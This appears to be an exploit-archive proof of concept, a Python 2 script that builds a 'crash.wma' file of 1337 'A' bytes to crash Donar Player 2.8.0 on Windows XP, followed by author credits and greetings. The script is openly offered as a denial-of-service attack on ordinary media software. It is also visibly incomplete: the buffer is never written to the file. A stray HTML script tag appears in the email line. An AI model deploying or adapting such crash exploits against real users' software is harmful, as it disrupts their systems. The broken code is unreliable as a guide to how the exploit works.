# ########################################
# Title : Donar Player 2.8.0 Denial of Service
# Software link : http://www.donarzone.com/downloads/donar-player-setup-free.exe , http://www.donarzone.com/donar-player
# Version : 2.8.0
# Tested on : Windows XP SP3 English
# Date : 3/07/2011
# Author : X-h4ck
# Website : http://www.pirate.al , # PirateAL Crew @2011 , http://theflashcrew.blogspot.com
# Email : mem001@live.com<script type="text/javascript">
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# Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta
# ########################################
filename = "crash.wma"
junk = "\x41" * 1337
FILE = open(filename, "w")
print " Open", filename, "on Donar Player and play it.. (the application will Crash)"
print " PirateAL Crew"